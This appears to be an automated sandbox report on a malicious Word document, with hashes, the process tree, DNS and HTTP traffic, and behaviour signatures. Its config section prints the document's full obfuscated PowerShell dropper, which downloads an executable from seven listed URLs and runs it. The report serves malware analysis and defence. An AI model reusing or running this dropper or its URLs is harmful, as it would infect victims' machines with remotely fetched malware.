Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    08/05/2024, 20:05 UTC

General

  • Target

    268104ac7fd244e33b0d072e3aaf8c7f_JaffaCakes118.doc

  • Size

    194KB

  • MD5

    268104ac7fd244e33b0d072e3aaf8c7f

  • SHA1

    165cb836f16b05ebb35ff609e09721a9df871427

  • SHA256

    b91795826d1ceca51e57aeb1aa43ac0960c1aed23a0a8ea2949528f7a5938598

  • SHA512

    795ebe5b1ee0df803b4dfe356d51a8c1a571133f917e2864e4accb71dadcbaa0ee8e79dafb4fdf0c2bd980b6c3115bccf2e6ff5cc3d96fbcaf5ab7a4c51e4934

  • SSDEEP

    1536:DGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilqfqdFTaFVT/EA8s9p8cjMfmVS9:+rfrzOH98ipgAd58cxs

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$Mqvb5er=(('O'+'qrd_')+'1'+'v');.('new-it'+'e'+'m') $EnV:uSERprofiLE\FY6iR_w\bD8J_41\ -itemtype DirecTORY;[Net.ServicePointManager]::"SEcUrItYpRO`ToC`Ol" = (('tl'+'s12'+',')+' t'+'l'+('s1'+'1, ')+('t'+'ls'));$Cdnkjwa = (('E0'+'c6v')+'gg');$Ap3w899=(('J'+'14')+'4b'+'0y');$Gxj515h=$env:userprofile+(('{0}F'+'y'+'6i'+'r_w{0}B'+('d8j_4'+'1')+'{0}') -f[char]92)+$Cdnkjwa+('.e'+'xe');$Eoybts6=(('N'+'rda17')+'c');$C7e4yd9=&('new-'+'ob'+'ject') NEt.WebcLienT;$G2nvhm_=(('h'+'tt')+'p'+(':/'+'/bo')+'ys'+('86.co'+'m/')+('w'+'p-a')+('d'+'mi'+'n/m')+('O/*'+'h')+'t'+('tp://'+'dac'+'y'+'c'+'lin.com/3'+'qx'+'/')+'Z'+'/'+('*'+'ht')+('t'+'ps')+':'+('//fe'+'p')+('a'+'mi.c')+'o'+('m/'+'wp-')+('inclu'+'d')+('es/oRT/'+'*h'+'t'+'tps')+(':'+'//')+'xn'+('x'+'xf')+'u'+('l'+'lh')+('d'+'.c')+('om'+'/wp')+('-a'+'d')+('m'+'in/')+('N'+'A'+'K/*https')+':/'+'/'+'ww'+'w.'+('b'+'usi')+'n'+('ess'+'-')+('m'+'an'+'agement-d'+'eg')+('r'+'ee')+('.'+'ne')+('t/w'+'p-')+('sn'+'a')+('p'+'shots/W'+'/*h')+('t'+'tp')+':/'+('/'+'homestay'+'.'+'d')+'es'+'i'+'g'+'n'+'/'+'w'+('ord'+'p'+'ress/M')+('/*'+'ht')+('tp'+'s')+':/'+('/c'+'s')+('c-co'+'mun'+'i'+'ty.')+('com/w'+'p')+'-'+('admi'+'n/')+'6'+('D'+'W/'))."Sp`LIT"([char]42);$Gmapn7t=('N'+('f2k84'+'p'));foreach($Bgrksqo in $G2nvhm_){try{$C7e4yd9."do`Wn`LOAdFI`LE"($Bgrksqo, $Gxj515h);$H0ygsf1=(('O'+'pdq')+('68'+'v'));If ((&('Get'+'-It'+'em') $Gxj515h)."l`engTH" -ge 29527) {&('Invok'+'e-I'+'tem')($Gxj515h);$Ntz0j1l=(('B'+'tn')+('2vq'+'2'));break;$X12i74e=(('M60'+'4c')+'3'+'w')}}catch{}}$Gxoj1ib=(('Jl'+'q')+('wm'+'3_'))
URLs
exe.dropper

http://boys86.com/wp-admin/mO/

exe.dropper

http://dacyclin.com/3qx/Z/

exe.dropper

https://fepami.com/wp-includes/oRT/

exe.dropper

https://xnxxfullhd.com/wp-admin/NAK/

exe.dropper

https://www.business-management-degree.net/wp-snapshots/W/

exe.dropper

http://homestay.design/wordpress/M/

exe.dropper

https://csc-comunity.com/wp-admin/6DW/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\268104ac7fd244e33b0d072e3aaf8c7f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:360
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2744
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -encod 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
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2680

    Network

    • flag-us
      DNS
      boys86.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      boys86.com
      IN A
      Response
    • flag-us
      DNS
      dacyclin.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      dacyclin.com
      IN A
      Response
    • flag-us
      DNS
      fepami.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      fepami.com
      IN A
      Response
      fepami.com
      IN A
      31.24.155.239
    • flag-us
      DNS
      xnxxfullhd.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      xnxxfullhd.com
      IN A
      Response
      xnxxfullhd.com
      IN A
      188.114.97.2
      xnxxfullhd.com
      IN A
      188.114.96.2
    • flag-us
      GET
      https://xnxxfullhd.com/wp-admin/NAK/
      powershell.exe
      Remote address:
      188.114.97.2:443
      Request
      GET /wp-admin/NAK/ HTTP/1.1
      Host: xnxxfullhd.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 08 May 2024 20:05:39 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      link: <https://xnxxfullhd.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dHb2ft92eu0Y0f0Q%2F9dd8jHXPOZOo6QCUSZIFAp2FulkVUYqy9FP%2FnHwCBYsoQh19JiALgjL6emmnhJrZyAcGA%2B9%2B5Q5qlhYOBfcApxj%2BZJLUesKoRcj3iStNY%2Bc3mlMBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 880c10ce68796519-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      www.business-management-degree.net
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      www.business-management-degree.net
      IN A
      Response
      www.business-management-degree.net
      IN CNAME
      business-management-degree.net
      business-management-degree.net
      IN A
      178.128.184.106
    • flag-us
      DNS
      homestay.design
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      homestay.design
      IN A
      Response
    • flag-us
      DNS
      csc-comunity.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      csc-comunity.com
      IN A
      Response
    • 31.24.155.239:443
      fepami.com
      tls
      powershell.exe
      344 B
      219 B
      5
      5
    • 31.24.155.239:443
      fepami.com
      tls
      powershell.exe
      344 B
      219 B
      5
      5
    • 188.114.97.2:443
      https://xnxxfullhd.com/wp-admin/NAK/
      tls, http
      powershell.exe
      777 B
      6.7kB
      9
      10

      HTTP Request

      GET https://xnxxfullhd.com/wp-admin/NAK/

      HTTP Response

      404
    • 178.128.184.106:443
      www.business-management-degree.net
      tls
      powershell.exe
      368 B
      219 B
      5
      5
    • 178.128.184.106:443
      www.business-management-degree.net
      tls
      powershell.exe
      368 B
      219 B
      5
      5
    • 8.8.8.8:53
      boys86.com
      dns
      powershell.exe
      56 B
      129 B
      1
      1

      DNS Request

      boys86.com

    • 8.8.8.8:53
      dacyclin.com
      dns
      powershell.exe
      58 B
      131 B
      1
      1

      DNS Request

      dacyclin.com

    • 8.8.8.8:53
      fepami.com
      dns
      powershell.exe
      56 B
      72 B
      1
      1

      DNS Request

      fepami.com

      DNS Response

      31.24.155.239

    • 8.8.8.8:53
      xnxxfullhd.com
      dns
      powershell.exe
      60 B
      92 B
      1
      1

      DNS Request

      xnxxfullhd.com

      DNS Response

      188.114.97.2
      188.114.96.2

    • 8.8.8.8:53
      www.business-management-degree.net
      dns
      powershell.exe
      80 B
      110 B
      1
      1

      DNS Request

      www.business-management-degree.net

      DNS Response

      178.128.184.106

    • 8.8.8.8:53
      homestay.design
      dns
      powershell.exe
      61 B
      122 B
      1
      1

      DNS Request

      homestay.design

    • 8.8.8.8:53
      csc-comunity.com
      dns
      powershell.exe
      62 B
      135 B
      1
      1

      DNS Request

      csc-comunity.com

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      4b89f0e5de8b628a7b3a63b4ecbcefda

      SHA1

      e1dbb22623f50cd257ddf4f7edbe4ac68876d13d

      SHA256

      ab2a0418dd5260b553766e1395e409ad296a706d44220e890a329a2941291f6f

      SHA512

      21b1928efe9f17f9ae35f2093a78ae9ded5a7f442f753acd02c40fb00822d0ba23d7c1aa5d5ded0fff44525f7c7e7f18cf8809badc70a254304de25dde9875e2

    • memory/360-33-0x0000000005A10000-0x0000000005B10000-memory.dmp

      Filesize

      1024KB

    • memory/360-2-0x000000007121D000-0x0000000071228000-memory.dmp

      Filesize

      44KB

    • memory/360-7-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/360-9-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/360-14-0x0000000005A10000-0x0000000005B10000-memory.dmp

      Filesize

      1024KB

    • memory/360-8-0x0000000005DA0000-0x0000000005EA0000-memory.dmp

      Filesize

      1024KB

    • memory/360-6-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/360-19-0x0000000005A10000-0x0000000005B10000-memory.dmp

      Filesize

      1024KB

    • memory/360-0-0x000000002F8F1000-0x000000002F8F2000-memory.dmp

      Filesize

      4KB

    • memory/360-32-0x0000000005A10000-0x0000000005B10000-memory.dmp

      Filesize

      1024KB

    • memory/360-66-0x000000007121D000-0x0000000071228000-memory.dmp

      Filesize

      44KB

    • memory/360-67-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/360-34-0x0000000005A10000-0x0000000005B10000-memory.dmp

      Filesize

      1024KB

    • memory/360-46-0x000000007121D000-0x0000000071228000-memory.dmp

      Filesize

      44KB

    • memory/360-48-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/360-49-0x0000000005A10000-0x0000000005B10000-memory.dmp

      Filesize

      1024KB

    • memory/360-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/360-65-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2680-40-0x000000001B530000-0x000000001B812000-memory.dmp

      Filesize

      2.9MB

    • memory/2680-41-0x0000000002250000-0x0000000002258000-memory.dmp

      Filesize

      32KB
